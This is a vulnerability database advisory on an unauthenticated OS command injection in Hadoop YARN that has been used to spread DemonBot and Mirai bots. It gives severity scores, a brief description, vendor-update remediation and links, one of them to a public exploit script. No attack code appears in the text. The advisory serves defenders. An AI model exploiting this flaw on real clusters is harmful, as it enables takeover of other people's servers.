Main Vulnerability Database Vulnerabilities #VU16008

#VU16008 OS command injection in Hadoop

Published: November 22, 2018 / Updated: June 26, 2023

Vulnerability identifier: #VU16008

Vulnerability risk: High

CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/U:Amber

CVE-ID: N/A

CWE-ID: CWE-78

Exploitation vector: Remote access

Exploit availability: No public exploit available

Vulnerable software:
Hadoop

Software vendor:
Apache Foundation

Description

The vulnerability allows a remote unauthenticated attacker to execute arbitrary shell commands on the target system.

The vulnerability exists in Hadoop YARN mechanism due to insufficient validation of user-supplied input. A remote unauthenticated attacker can inject and execute arbitrary shell commands to infect Hadoop clusters on Linux servers with unsophisticated new bots (DemonBot, Mirai bot) and compromise vulnerable system.

Remediation

Install update from vendor's website.

External links

https://blog.radware.com/security/2018/10/new-demonbot-discovered/
https://asert.arbornetworks.com/mirai-not-just-for-iot-anymore/
https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py

#VU16008 OS command injection in Hadoop

Description

Remediation

External links

Please verify you're human